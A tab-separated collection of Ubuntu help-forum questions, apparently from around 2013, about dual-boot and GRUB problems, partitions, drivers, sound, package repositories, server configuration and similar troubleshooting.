392947	boot-repair ubuntu 12.04.3 whilst leaving secureboot on	i just installed ubuntu 12.04.3 , and afterwards ubuntu boots perfectly ( even with secureboot still enabled etc ) , however selecting windows 8 leads to the common errors : secure boot forbids loading module from ( hd1 , gpt6 ) /boot/grub/ntfs.mod no such device 564525c65425c5233 unknown command `drivemap' invalid efi file path if i use boot-repair to fix grub , then disable secureboot both os boot . however , i 'd like to know if there is a way where i can have win 8 boot whilst leaving secureboot switched on for the added security benefits ? i 'd also like to understand better what exactly is going on here , how can it be secureboot causes issues for win 8 loading here , but ubuntu is fine..
392952	does n't booting after installed updates in ubuntu 12.04 lts	ubuntu 12.04 lts does n't booting after installing the updates . recently i have installed ubuntu in my system also i installed latest updates . after installing the updates it does n't booting and showing the error message as `` could not write bytes : broken pipe '' . what should i do to get into desktop ...
392956	how detect modem connected to the usb of system through commands in linux	i going to develop device driver for cdma modem . before going to develop device driver first of all i want to find whether my modem is connected or not , if connected i want to detect the name of the device present in the /dev directory so that i can open that device file and send at commands to the modem.how can i detect my modem using commands please help me
392958	need to rotate logs from virtual hosts on ubuntu vps	i have a 1gb vps running ubuntu that i have installed apache , mysql and php . i have 3 sites all in my home directory that are using name based virtual hosting . i have created three separate files in /etc/apache2/sites-available and enabled them via a2ensite there is also the default site in /var/www as well . now my concern is that each one of these sites is running about 10,000 cron jobs per day . how do make sure the logs of each of these do not grow to big and eat all the memory ? how would i configure the log rotate and how often would one need to perform this task with 1gb of ram ?
392959	ca n't boot into ubuntu after windows 8.1 upgrade , boot-repair does n't fix it	i have a sony vaio duo 11 convertible , it was successfully dual booting lubuntu 13.10 and windows 8 , but after the upgrade to windows 8.1 it does n't load anything but windows . i disabled windows ' `` quick boot '' feature , then run boot-repair , but it doens't fix the issue ( it used to work when windows 8 messed the boot config , but not with windows 8.1 ) . i installed esaybcd on windows and now i see its boot loader , but not grub . i even tried chrooting and grub-installing on /dev/sda , but i do n't think that grub is the boot loader loaded at startup . my guess is that windows put a boot loader somewhere else than /dev/sda . if i start the system with a refind usb disk i can successfully load lubuntu . this is boot-repair output : http : //paste.ubuntu.com/6598795/ ( this one was run after booting sda2 lubuntu from a refind usb disk , but i also tried with live cds with the same results ) a brief history of how i got there : in bios , i disabled `` secure boot '' and enabled `` uefi mode '' . formatted the hard disk to wipe the sony pre-installed windows 8 installed lubuntu 13.10 on sda2 ( sda1 was created by the installer as uefi partition ) installed android-x86 on sda3 ( everything was working so far ) installed windows 8 in the free space ( it created sda4-5-6 ) . windows screwed up the boot , but boot-repair fixed it . windows kept overwriting the boot loader until i removed its `` quick boot '' option . ( everything was working again ) upgraded windows to 8.1 , now there is a windows boot loader , i removed ( again ) the `` quick boot '' option , i repeatedly installed grub on /dev/sda but i always get another bootloader ( windows/microsoft/easybcd ? ? ) that is only able to run windows . i would like to understand which boot loader is run at startup , where it is located , and how i can change that . thank you ! edit : i installed refind in windows following the official instructions , and effectively changing the `` windows boot manager '' section so that now it looks as follows : s : \efi\refind > bcdedit /enum active /v windows boot manager -- -- -- -- -- -- -- -- -- -- identificatore { 9dea862c-5cdd-4e70-acc1-f32b344d4795 } device partition=s : path \efi\refind\refind_x64.efi description refind am locale it-it inherit { 7ea2e1ac-2e61-4728-aaa3-896d9d0a9f0e } default { b781b519-6749-11e3-a4a1-eb3a69ac7fb1 } resumeobject { b781b518-6749-11e3-a4a1-eb3a69ac7fb1 } displayorder { b781b519-6749-11e3-a4a1-eb3a69ac7fb1 } { b781b512-6749-11e3-a4a1-eb3a69ac7fb1 } { b781b524-6749-11e3-a4a1-eb3a69ac7fb1 } toolsdisplayorder { b2721d73-1db4-4c62-bf78-c548a880142d } timeout 5 displaybootmenu yes but i still get a boot loader that is not refind ! ! it looks similar to this instead : windows legacy boot loader
392965	how to copy my ubuntu system ( laptop ) to another laptop ?	i am looking to copy the whole ubuntu system from one laptop to another laptop ( with no operating system ) , how can i do it ? i found older threads how to back up a system ? but they looks to be 2-3 years old so i thought we may be having a better solution now ?
392967	pcmanfm tries to remount an already mounted network share	i have 2 network shares ( storage_1tba , storage_1tbb ) and 1 local partition ( 140gb fs ... ) auto-mounted in /etc/fstab . pcmanfm sidebar reports those 3 locations , but only 2 are reported as mounted . when i try to open the storage_1tb1 in pcmanfm default mount points , i receive a error : mount : according to mtab , //192.168.0.11/storage_1tba is already mounted on /media/storage_1tba mount failed pcmanfm screenshot you can see in screenshot , bellow red outline is a bookmark named storage_1tba - i use that one for accessing . my /etc/fstab contents : //192.168.0.11/storage_1tba /media/storage_1tba cifs defaults , user=myuser , password=storage 0 0 //192.168.0.11/storage_1tbb /media/storage_1tbb cifs defaults , user=myuser , password=storage 0 0 uuid=04aa1f0d08487c1a /media/docs ntfs defaults 0 1 i tried with defaults option and without . same effect and i am used to this situation , but still ... i was wondering if there is something misconfigured that i receive this error and ca n't use default sidebar mount points
392973	how do i find out lines of a file that are not present in another file ?	i have two files a and b. i want to find out which lines of file b are not present in the file a . how do i do this ? the lines can be at any position in file a
392979	black screen while installing ubuntu 12.04.3 on dell precision m4800	i 'm trying to install ubuntu 12.04.3 lts on my new dell precision m4800 ( from a usb key , made from ubuntu ) and i 've got that problem : after choosing my language on the boot screen , i can see no more things on my screen , it keeps black ... the graphic card is an nvidia quadro k2100m ... i tried to boot with an ubuntu 12.04.1 install usb key , and i had something on the screen but my ethernet card was n't detected ( the wifi was ok ) ...
392983	removed libgcc1 , libc6 and libstdc++6	i have removed the mentioned libraries . then my system disconnected from nis service and many packages are being removed . the problem is i am not even able to login in my system . when i restarted it is showing `` low graphics mode error '' . i do not know what to do please help me . i am a beginner to ubuntu .
392985	svn/svnserve problems with commits	i 've installed svn on my local machine and i 've got a problem . i want to commit some files to my repository . i used svnadmin to create and configured entire svn so it works to some point . now , i want , e.g . to commit files from anywhere to my repo , but i keep getting errors like : this directory is not under version control . so i tried to commit files which were created in the repository manually ( what 's the point in doing that ? ) and i did it . but it works only if i write : svn checkout file : /// [ here goes my repo 's path ] /test the output is e.g . checked out revision 7 but when i type : svn checkout svn : //127.0.0.1/test the output goes like nothing ever happened : checked out revision 0 any ideas how to really commit files to a server ? i 've been trying putting paths/urls as an argument for svn commit , like hundred times and i have no more ideas how to fix it , please help : /
392986	yahoo and evolution problem	having functioned properly for years , evolution has now started to file my incoming yahoo inbox mail in `` junk '' . any suggestions ?
392988	why i have several mount point with the same name ?	i have 750gb internal hard-disk , with 4 partition . one partition is for ubuntu , another 3 partition are only for storage . one of my partition name was `` virtual box '' . suddenly , partition name in sidebar shows `` virtual box '' , but when i check properties of partition it shows `` /media/virtual box2/ '' and when i go to command line and do ls inside /media/ directory . it shows below 3 partition . and i have ubuntu virtual box file in my `` virtual box '' partition , but it says `` access denied '' for `` virtual box1 '' name there . kindly help me in fixing my partition . i am not able to open my `` virtualbox '' file .
392990	how to get nginx with spdy on ubuntu without having to compile it ?	i observed that none of the included nginx blends has the spdy module enabled and i do n't want to manually compile it for that . i am looking for a apt repository solution but i was n't able to find one yet .
392992	using old same-version iso for new install . any problems ?	i have downloaded the ubuntu 13.10 iso several weeks ago , but had n't got a time to install the os , so should it be okay if i burn the iso to my usb using that iso , or i should redownload ? will there any new updates being rolled onto me , or they will be updated straight at install ? thanks . sorry for my bad english .
392998	how to increase boot partition on ubuntu server , via ssh ?	i have a ubuntu server currently running 13.04 . i want to upgrade to 13.10 but i get an error : not enough free disk space the upgrade has aborted . the upgrade needs a total of 61.0 m free space on disk '/boot ' . please free at least an additional 21.5 m of disk space on '/boot ' . empty your trash and remove temporary packages of former installations using 'sudo apt-get clean ' . the boot partition is : filesystem size used avail use % mounted on /dev/sda5 76m 35m 38m 48 % /boot i have followed the various other questions to free more space . i ran the clean command above , and i have removed all old kernels so now i only have the latest kernel . looking around , it seems that 200mb is a recommended size for /boot , but the only answers i 've seen say to use gparted on the livecd . however , i only have ssh access to the server so this is not an option . is there some way to repartition the hard drive over ssh ?
393000	ubuntu locale difference between zh_cn.utf8 and zh_cn.utf-8	there are some questions about linux locale confused me much . what is the difference between zh_cn.utf8 and zh_cn.utf-8 ? are they the same locale ? run locale command : lang=zh_cn.utf-8 language= lc_ctype= '' zh_cn.utf-8 '' lc_numeric=zh_cn.utf-8 lc_time=zh_cn.utf-8 run locale -a command : c c.utf-8 en_ag en_ag.utf8 posix zh_cn.gbk zh_cn.utf8 posix anther two question : what is the difference between c and c.utf-8 ? what is the difference between en_ag and en_ag.utf-8 ?
393005	having problem with fonts in vim-airline	i wanted to install vim-airline but i am having problems with unicode fonts . i have installed it with vundle : .vimrc set encoding=utf-8 bundle 'bling/vim-airline' let g : airline_powerline_fonts = 1 let g : airline_theme='powerlineish' .fonts $ ll .fonts total 376 drwxr-xr-x 2 xxx xxx 4096 gru 19 13:26 anonymouspro drwxr-xr-x 2 xxx xxx 4096 gru 19 13:26 dejavusansmono -rw-r -- r -- 1 xxx xxx 334548 gru 19 13:42 dejavu sans mono for powerline.ttf drwxr-xr-x 2 xxx xxx 4096 gru 19 13:26 droidsansmono drwxr-xr-x 2 xxx xxx 4096 gru 19 13:26 inconsolata drwxr-xr-x 2 xxx xxx 4096 gru 19 13:26 inconsolatadz drwxr-xr-x 2 xxx xxx 4096 gru 19 13:26 liberationmono drwxr-xr-x 2 xxx xxx 4096 gru 19 13:26 meslo drwxr-xr-x 2 xxx xxx 4096 gru 19 13:42 powerlinesymbols -rw-r -- r -- 1 xxx xxx 1599 gru 19 13:26 readme.rst drwxr-xr-x 2 xxx xxx 4096 gru 19 13:26 sourcecodepro drwxr-xr-x 5 xxx xxx 4096 gru 19 13:26 terminus drwxr-xr-x 2 xxx xxx 4096 gru 19 13:26 ubuntumono fc-cache -vf ~/.fonts /home/xxx/.fonts : caching , new cache contents : 1 fonts , 11 dirs /home/xxx/.fonts/anonymouspro : caching , new cache contents : 4 fonts , 0 dirs /home/xxx/.fonts/dejavusansmono : caching , new cache contents : 4 fonts , 0 dirs /home/xxx/.fonts/droidsansmono : caching , new cache contents : 1 fonts , 0 dirs /home/xxx/.fonts/inconsolata : caching , new cache contents : 1 fonts , 0 dirs /home/xxx/.fonts/inconsolatadz : caching , new cache contents : 1 fonts , 0 dirs /home/xxx/.fonts/liberationmono : caching , new cache contents : 4 fonts , 0 dirs /home/xxx/.fonts/meslo : caching , new cache contents : 6 fonts , 0 dirs /home/xxx/.fonts/powerlinesymbols : caching , new cache contents : 1 fonts , 0 dirs /home/xxx/.fonts/sourcecodepro : caching , new cache contents : 7 fonts , 0 dirs /home/xxx/.fonts/terminus : caching , new cache contents : 0 fonts , 3 dirs /home/xxx/.fonts/terminus/bdf : caching , new cache contents : 18 fonts , 0 dirs /home/xxx/.fonts/terminus/pcf : caching , new cache contents : 18 fonts , 0 dirs /home/xxx/.fonts/terminus/psf : caching , new cache contents : 0 fonts , 0 dirs /home/xxx/.fonts/ubuntumono : caching , new cache contents : 4 fonts , 0 dirs /var/cache/fontconfig : not cleaning unwritable cache directory /home/xxx/.cache/fontconfig : cleaning cache directory /home/xxx/.fontconfig : not cleaning non-existent cache directory fc-cache : succeeded yet i still have those symbols i have even tried inserting the symbols to .vimrc let g : airline_left_sep = '' let g : airline_left_alt_sep = '' let g : airline_right_sep = '' let g : airline_right_alt_sep = '' let g : airline_symbols.branch = '' let g : airline_symbols.readonly = '' let g : airline_symbols.linenr = '' but they get inserted as such :
393006	mounting the live-usb partition	it is possible to mount the partition where the iso extracted ( or we can say the root partition of a live-usb ) not as read-only but as read/write-able partition ?
393011	partition issue - shows 3 name and throws error	i have 750gb internal hard-disk , with 4 partition . one partition is for ubuntu , another 3 partition are only for storage . one of my partition name was `` virtual box '' . suddenly , partition name in sidebar shows `` virtual box '' , but when i check properties of partition it shows /media/virtual box2/ image 1 : and when i go to command line and do ls inside /media/ directory . it shows below 3 partition . image 2 : and i have ubuntu virtual box file in my `` virtual box '' partition , but it says `` access denied '' for `` virtual box1 '' name there . image 3 : kindly help me in fixing my partition . i am not able to open my `` virtualbox '' file .
393014	installing dual boot ubuntu 64 bit 13.10 along side windows 8.1 enterprise	i am planning on installing the 64 bit ubuntu 13.10 along side win 8.1 enterprise .my pc is home built from around 2005 . i already partitioned the c : drive such that the physical drive c now has the c drive for win 8.1 and that same physical drive also has a logical drive called f. i allocated about 15 gigs for this logical f drive . the d drive is the dvd that has the ubuntu live dvd/ready to install ubuntu on it . so my question is should i wipe out the f drive by reallocating this 15 gig space back to the c drive , and then install ubuntu and let ubuntu do the partitioning , or is it better the way i have it right now ? i am looking for the easiest ubuntu install with minimal hassle . thanks , jim
393017	uninstalling lubuntu	i have win7 and lubuntu installed as dual-boot , that was quite simple . but how to remove lubuntu ? ... seems , at first glance , not so simple . how to do this without leftovers ? thanks for you advice .
393018	create local copy of ubuntu remote repository	good day . i 'm trying to create local copy of official ubuntu repository ( 12.10 or 13.10 does not matter ) . as far as i know i could recursively download all packages from the mirror ( http : //mirror.yandex.ru/ ) but there is any othe way to do the job ? thank you .
393021	pxe-e32 tftp time out	i have a hp proliant microserver running centos 6.5 server with 2 network cards . i have virtualised a machine running ubuntu 12.04 and given it both network cards . the virtual machine gets its ip address via dhcp from the centos machine over one network card and i have a thin client connected to the other network card on the virtual machine . ltsp has been installed , along with dhcp on the virtual ubuntu machine . i keep getting pxe-32 tftp timeout error when trying to boot the thin client . if i change the next-server parameter to a different ip than the virtual ubuntu or comment it out i get an arp timeout error . these errors have happened on ubuntu 12.04 , 10.04.3 and 10.04.4 . i have tried booting with 3 different thin clients all with different network cards . all firewalls are disabled , iptables , ufw are not blocking the port , i have confirmed the port 69 is open . i can download the pxelinux.0 file via terminal but thin client will not boot ! please help .
393023	what is the best way of making an arm ubuntu desktop ?	i 'm looking for a way to make an arm desktop with moderate specs . ideally , it would be something like this : cpu : armv7 dual-core 1ghz or greater ram : âľ1gb storage : âľ120gb dvd rw ( preferably slot-load ) preferably open source hardware the gpu should be fast enough for compositing , hd video , and ps2-quality graphics , so it is unlikely to be a limiting factor ( from my experience of android smartphones ) as long as the drivers work properly . i 've recently been exploring the idea of using the ouya as a tiny ubuntu desktop : how do i install ubuntu on an ouya ? i did n't get very far with that , so i 've had a good look around for other arm hardware . the best options i 've found are : beaglebone black pandaboard es olinuxino they are all open hardware so that 's a bonus , and the first two have some unofficial ubuntu support . the versions of the olinuxino do n't make sense to me ; some versions seem to be slower than their predecessors , and i ca n't find the specified cpu clock rate of the a20 ( presumably the latest ) anywhere . i 've been exploring the pandaboard es in more detail because it currently looks like the best option for a desktop , and i 'm sharing my findings q/a-style , so see my partial answer below . if you know of a better option , or better hardware becomes available , then please answer with your solution .
393026	constant buzzing noise from speaker when headphones are plugged in ubuntu 13.04	i 'm using lenovo y410p . after i plug in the headphones , there 's constant buzzing noise from speaker . if i unplug them , the noise disappears . if i disable `` auto-mute mode '' through alsamixer , the noise disappeared immediately while the headphones are stilled plugged in . and the noise came back immediately if i enable `` auto-mute mode '' . but this is not a good solution because the feature of auto switching to headphones or speaker is gone . btw , my problem is similar to this one except that the noise remains whether playing music or not . thank you very much !
393028	gpgkeys ca n't be retrieved	i added a repository using sudo add-apt-repository ppa : tualatrix/next after adding it i get the message : gpg : keyring `/tmp/tmpk2n9xi/secring.gpg ' created gpg : keyring `/tmp/tmpk2n9xi/pubring.gpg ' created gpg : requesting key 0624a220 from hkp server keyserver.ubuntu.com gpgkeys : key fe85409eeab40eccb65740816af0e1940624a220 ca n't be retrieved gpg : no valid openpgp data found . gpg : total number processed : 0 i even installed y-ppa-manger and tried importing all the keys . got success message there but that does n't solve the gpg key issue . thanks in advance for any help and suggestions !
393033	installing graphic drivers for geforce 8500 gt	using the latest ubuntu 13.10 and trying to get the propriatory ( spelling ) drivers for my geforce 8500 gt . but it doesnt show in the `` additional settings '' . its blank . am i doing something wrong or should i download it from the nvidia homepage ? how do i install it ? step by step would be awsome for me as a non-geek
393038	unable to play quake live on u12.04 with firefox 25 . 0.1	i 'm unable to open the file , which you download from the quake live site , in archive manager . the following error is shown : archive : /tmp/quakelivesetup_841.exe [ /tmp/quakelivesetup_841.exe ] end-of-central-directory signature not found . either this file is not a zipfile , or it constitutes one disk of a multi-part archive . in the latter case the central directory and zipfile comment will be found on the last disk ( s ) of this archive . zipinfo : can not find zipfile directory in one of /tmp/quakelivesetup_841.exe or /tmp/quakelivesetup_841.exe.zip , and can not find /tmp/quakelivesetup_841.exe.zip , period . so whot am i doing wrong ? ?
393041	i can not connect on ubutu service port 3050 , from my network	i have the firebird service running on my ubuntu server and it is working fine inside the server . but when i try to use from another machine it does not work . like a firewall issue . i did make some tests to check out the ubuntu environment : root @ ubuntuserver : ~ # ps -ef | grep fbserver firebird 1170 1 0 12:28 ? 00:00:00 /usr/sbin/fbguard -daemon -forever -pidfile /var/run/firebird/2.5/fbserver.pid root 3251 3201 0 13:30 pts/0 00:00:00 grep -- color=auto fbserver root @ ubuntuserver : ~ # iptables -l chain input ( policy accept ) target prot opt source destination accept all -- anywhere anywhere state related , established accept tcp -- anywhere anywhere tcp dpt : gds-db accept tcp -- anywhere anywhere tcp dpt:3051 chain forward ( policy accept ) target prot opt source destination chain output ( policy accept ) target prot opt source destination root @ ubuntuserver : ~ # nmap -p 3050 localhost starting nmap 6.40 ( http : //nmap.org ) at 2013-12-19 13:34 utc nmap scan report for localhost ( 127.0.0.1 ) host is up ( 0.00010s latency ) . port state service 3050/tcp open gds_db nmap done : 1 ip address ( 1 host up ) scanned in 0.08 seconds root @ ubuntuserver : ~ # uname linux root @ ubuntuserver : ~ # uname -a linux ubuntuserver 3.11.0-14-generic # 21-ubuntu smp tue nov 12 17:04:55 utc 2013 x86_64 x86_64 x86_64 gnu/linux root @ ubuntuserver : ~ # telnet localhost 3050 trying 127.0.0.1 ... connected to localhost . escape character is '^ ] ' . ^ [ ^cconnection closed by foreign host . root @ ubuntuserver : ~ # i think there is something more blocking the access on it . i was able to ping this from other machines on my network . please , help me on it .
393044	intel quick sync video codec	i 'm looking for intel quick sync video codec and / or video encoding software that also can take benfit of intel qsv . any suggestion ?
393045	trying to mount ddrescue image from a 1tb crashed ntfs drive	it was time , after 5 years my 1tb external drive with all of my family photos and all my music crashed . stupidly enough , i did not have two drives in raid , which i will do in the future . i successfully rescued the files with dd_rescue to my other 2tb movie drive on my server , however i can not seem to understand how to mount this .img file . i am using gnu ddrescue i really need to get this fixed , otherwise i 'm screwed here 's how i have executed my ddrescue command sudo ddrescue /dev/sdh1 /media/external/rescue/rescue.img /media/external/rescue/rescuelog initial status ( read from logfile ) rescued : 1 tb , errsize : 30944 kb , errors : 345 finished here are my test commands file image.img image.img : x86 boot sector , code offset 0x52 , oem-id `` ntfs `` , sectors/cluster 8 , reserved sectors 0 , media descriptor 0xf8 , heads 255 , hidden sectors 2048 , dos < 4.0 bootsector ( 0x80 ) fdisk -l image.img disk image.img : 1000.2 gb , 1000203091968 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953521664 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x2052474d this does n't look like a partition table probably you selected the wrong device . device boot start end blocks id system image.img1 ? 6579571 1924427647 958924038+ 70 disksecure multi-boot image.img2 ? 1953251627 3771827541 909287957+ 43 unknown image.img3 ? 225735265 225735274 5 72 unknown image.img4 2642411520 2642463409 25945 0 empty partition table entries are not in disk order i have absolutely no idea why fdisk shows all these wierd partitions such as 'disksecure multi-boot ' and two 'unknown ' partitions , the parted command gave me information that seemed correct though parted image.img print warning : you are not superuser . watch out for permissions . model : ( file ) disk /media/external/rescue/image.img : 1000gb sector size ( logical/physical ) : 512b/512b partition table : loop number start end size file system flags 1 0.00b 1000gb 1000gb ntfs i am not sure if i have the correct flags and such , but here i 'm trying to mount the drive sudo mount -r -o loop image.img /mnt ntfs_mst_post_read_fixup_warn : magic : 0x00000000 size : 4096 usa_ofs : 0 usa_count : 65535 : invalid argument index buffer ( vcn 0x0 ) of directory inode 0x5 has a size ( 24 ) differing from the directory specified size ( 4096 ) . ntfs_mst_post_read_fixup_warn : magic : 0x00000000 size : 4096 usa_ofs : 0 usa_count : 65535 : invalid argument index buffer ( vcn 0x0 ) of directory inode 0x5 has a size ( 24 ) differing from the directory specified size ( 4096 ) . ntfs_mst_post_read_fixup_warn : magic : 0x00000000 size : 4096 usa_ofs : 0 usa_count : 65535 : invalid argument index buffer ( vcn 0x0 ) of directory inode 0x5 has a size ( 24 ) differing from the directory specified size ( 4096 ) . thanks in advance guys !
393046	web based download manager	at some places some ports/protocols are disabled such as ssh . so it 's simply not possible for me to use such things like wget . so i am looking for a download manager that i can control it over http protocol . when i mean download manager , i mean an http and ftp downloader not a torrent client . are there any software packages like that ?
393048	does update manager show updates for software in ppas ?	i 'm new to ubuntu , and i have some basic knowledge of how it works . i have a question about ppas , and installing an application/program/script via ppa . when i add a ppa to the system , and install the software packages it contains in my ubuntu , will update manager show updates for that software ? i think it does but i want to make sure . thank you in advance .
393051	toshiba laptop keyboard and mouse intermittently stop working	hey i 've done quite a bit of googling and ca n't find the solution to my problem . i 've also been away from linux for over a year so if i need to provide my information i apologize . however i 've installed ubuntu 12.04 64bit and on my toshiba l875d-s7332 laptop when it boots up sometimes the onboard touchpad and keyboard do n't work . i 'm able to use an external usb keyboard and mouse and sometimes going into settings > lanuage support and switching the keyboard input method from ibus and back fixes it . but not always . and sometimes they randomly start working . i 'm sure it 's probably a simple fix but since its randomly resolving itself at times i ca n't pinpoint what the cause or resolution is .
393054	error in creating a blob on microsoft azure	i 'm trying to create a container on windows azure . the files are located remotely . i do n't get the error when i run the same script on localhost . the problem is when i run the script which is deployed through github on the azure platform . specifically , when i try and add this line $ blobrestproxy = servicesbuilder : :getinstance ( ) - > createblobservice ( $ connectionstring ) ; the error i 'm getting is : - warning : require_once ( http/request2.php ) : failed to open stream : no such file or directory in c : \dwasfiles\sites\icpro\virtualdirectory0\site\wwwroot\windowsazure\common\internal\http\httpclient.php on line 33 fatal error : require_once ( ) : failed opening required 'http/request2.php ' ( include_path= ' . ; c : \php\pear ' ) in c : \dwasfiles\sites\icpro\virtualdirectory0\site\wwwroot\windowsazure\common\internal\http\httpclient.php on line 33
393055	recoprding from cassette player on ubuntu 12.04 with creative soundblaster c106 soundcard	i can record sound from my web-cam connected via usb but can not get any input from my cassette tape recorder , or see any indication that there is any sound input whether i use a usb or phono connection in either the motherboard or the soundcard
393056	copy files from folder to folder on base of md5sum	i have a problem regarding to copying files , problem : i have a list of md5sum , and a folder having 1000+ files , how can i move files from folder to another folder with the help of md5sum list . i can take md5sum against all files , currently present in folder , now what script to to get read scripts from a list then compare the md5sum with list 's md5sum . if they are matched than the script move to another location . reading md5sum of files ( little code ) for i in ls ; do md5=md5sum `` $ { i } '' ; i do n't know what condition will come here ! to read list and compare with lists md5sum ; mv `` $ { i } '' $ m ; done if it 's possible then please guide me how can i do this ?
393057	install a printer with ubuntu	i have to install a printer hp deskjet 3524 and i have a ubuntu system ( 12.04 ) . the guide gives me information only for windows and mac . which are the steps i have to do to install it
393059	can not browse horizon `` openstack-dashboard ''	i install maas > juju > openstack with co-located services . the `` openstack-dashboard '' charm is installed on the same node with `` keystone '' . all the units are up with no errors , and this is the output of juju stat i also mapped all the hosts names at /etc/hosts . yet the http : //openstack-dashboard/horizon 500 internal service error` . i got the apache2 error.log and it 's filled with python exceptions which `` as a sysadmin '' i can not interpret . how can i solve this ?
393060	starting load fallback graphics devices [ fail ] - at the boot time	i had some problem when ubuntu is booting . after bios windows it trows this mistake : starting load fallback graphics devices [ fail ] after this i see terminal with suggestions to enter login and password . i could n't figure out why this happen ? here is my boot.log it was started after i restarted pc . i have nvidia video card . by the way it has another trouble at /var/log/boot.log : starting vmware services\ : vm monitor [ fail ] vm communication ... [ fail ] vm socket family [ fail ] but i deleted all vmware product . and now this message is discard . - how to solve this trouble ?
393062	copy : how to recover files which have disappeared	some files in copy have disappeared . how can i recover them ?
393067	php-fpm eating memory & creating many pools	i set up my nginx with php-fpm . each vhost has its own unix-socket and separate pool . but the problem is that php-fpm is creating 7 thread for each config pool that i created in /etc/php5/fpm/pool.d/ why ? and how could i define that the pool creates only when the url related to vhost is viewed .
393069	unjustified hibernation after suspend	lately i have an issue with my power configurations . after my laptop returns from suspend mode it goes straight to hibernation . here is a pic after i repower the computer ( note the power level ) : here are my power configurations : i have no idea how to fix it . any help would be most welcome .
393075	no headphone sound in 13.10 macbook	i 'm having a problem with my jack female , ca n't make my headphones work ! i 've been looking all over the internet and ca n't find a solution ... i installed 13.10 on my 2008 macbook a week ago , so i 'm not really a master in the tech departement . i 've tried to go directly enabling/disabeling it directly with the command windows on my sound card , the thing is that it does n't enable the headphones working but enable sound from de computer speakers while headphones plugged in ... can someone give me a lead on a way to do it , cause i really need to be able to listen to music with headphones , my 6weeks old son would n't like to listen to loud music ... thanks
393076	is there a usable gui version of photorec or testdisk ?	i wanted to recover some files from my sd card with photorec , everything went fine , i use ubuntu for a few years now , so i 've seen the terminal quite a few times . but i wondered if a gui version of photorec exists , that you can download from the software center for example . is there any ? if yes how to install it ( ubuntu 13.10 ) ?
393077	deluge loses track of .torrent after reboot	i have a problem with deluge which i do n't understand why it 's happening . so i download a torrent , all works fine untill the next boot when deluge practically `` forget '' that i already downloaded those torrents and it starts downloading them again or just gives `` error '' like you can see in the screenshot below . i have to mention that i download the files on a ntfs partition , if that helps in any way.why is this happening and how can i solve it ?
393079	how can i install the latest flash player for chromium ? and keep getting updates for it	how can i install the latest flash player for chromium ( ubuntu 13.10 x32 bit + x64 bit ) , and keep getting updates automatically for it ? thanks : )
393080	microphone input levels registering , mute off , loopback on , but no sound	-i have something of an anomalous sound problem . it 's with a via vt1708s onboard soundcard . i have removed the front panel connection in an attempt to minimise potential problems , since the jack detection seems very buggy in those audio ports anyway . i 've been trying to get the mic to work in linux 12.04.3lts but it 's very cagey . if i record in audacity , the sound will pick up , though sometimes it crashes mid stream . if i start jack server and load rakarrak , the db meter shows i 'm playing guitar , but i do n't hear any sound if i put gstreamer-properties into the terminal and test the input channel , suddenly i hear the mic . if i load the loopback module from the terminal i also get sound , though i seem unable to get the loopback to run by default even if i add load-module module-loopback to /etc/pulse/default.pa when the mic does produce sound it is often very crackly . i have attempted the tsched=0 edits to the default.pa file without success . i have used the terminal version of alsamixer and tried just about every permutation of volume and mute status you can think of and the mic will never produce sound . i think i 'm just about ready to admit defeat . unless anyone has any idea ? thanks for your time if you do .
393084	upstart to manage a byobu 'd cgminer	how do i get upstart to manage cgminer in a byobu terminal ? using the upstart script below , i can get cgminer to run with the commented out command , but i ca n't get it wrapped in a byobu session ? thank you # cgminer author `` zzzzzz '' description `` run the cgminer litecoin miner '' # start on runlevel [ 2345 ] start on ( login-session-start or desktop-session-start ) stop on runlevel [ 016 ] setuid xxxxxx setgid xxxxxx expect fork # command line script export user= '' xxxxxx '' export home= '' /home/xxxxxx '' export display= '' :0.0 '' export gpu_max_alloc_percent=100 export gpu_use_sync_objects=1 export xauthority=/.xauthority xhost +localhost # logger -t `` $ 0 '' `` debug : cgminer upstart id `id` '' # logger -t `` $ 0 '' `` debug : cgminer upstart xhost `xhost` '' byobu -s cgminer -c `` /usr/local/bin/cgminer -- config /home/xxxxxx/.cgminer/cgminer.conf '' # /usr/local/bin/cgminer -- config /home/xxxxxx/.cgminer/cgminer.conf end script # auto restart respawn # limit respawns to 10 time in 5 seconds , otherwise fail respawn limit 10 5
393088	file recreation	there is a game that a play and as a result of playing it there are these files that appear in my terminal . so what i did was rename those files and move them into one directory because when they get downloaded onto my computer initially the names of the files are a bit daunting . well when i revisit and launch the game again the files , with the initial names , reappear in my directory . and the files that i renamed are still where i put them . why would the website redownload those files onto my computer even though they still exists just with different names and in a different directory ?
393089	juju consolidation and constrains	i 'm trying out ubuntu cloud infrastructure in a lab environment , i had couple attempts and fails mostly because my references are outdated . `` my main ref . now is https : //help.ubuntu.com/community/ubuntucloudinfrastructure '' my lab consists of three powerful servers , 3 low pcs , and 4 notebooks . constrains : due to diversity in resources . i tried to selectively direct juju to deploy services by commissioning the low nodes first then bootstrap/deploy the needed service . but i saw in another ticket here that i can do that by specifying constrains . is there a reference/ticket/how to article for that ? consolidation : as jitsu is obsolete , and juju deploy to still consumes whole nodes for low services , i think add-node is the best alternative , yet again i lack the proper documentation to try this . so i guess i 'm asking for some demo case studies or best practices guides from the experts .
393094	ubuntu locking up during install on vmware esxi 4.1	i am having an unfortunate issue while attempting to install ubuntu on a virtual machine using vmware esxi 4.1 . what happens is i attach the iso image to attach on boot . when i boot the machine it asks me what language to use ( i select english ) . then it displays a menu of different things i can do , one of them being : `` install ubuntu server . '' if i select that option the screen does a refresh like it would switch to a different screen , but the same install menu is just shifted to the upper left hand side of the terminal . after that happens the cpu is pinned and nothing further happens . i 've tried some of the other options in that menu such as memory check and disk check . memory check works , but disk check does the exact same thing as what happens when i try to install . i 've tried both 32bit and 64bit architectures . i 've tried the alternate versions of ubuntu instead of server . i 've tried changing the number of cpus allocated to the machine to 1 . not quite sure what to do next . any help would be greatly appreciated . machine specs : e3-1245v2 32gb ram 2tb hdd thanks , sean .
393097	how to disable/remove a desktop widget	i added a widget `` bouncy ball '' to the desktop and accidentaly in its settings set auto-bounce to full . now it is bouncy accross my desktop really fast . it can not be hovered to reveal side options . i want to know if there is any other method to disable/remove this particular gadget . ( or to disable all gadgets in extreme case , it is really annoying . i tried to cath it with mouse but no luck , although i am very good fps sniper : ) )
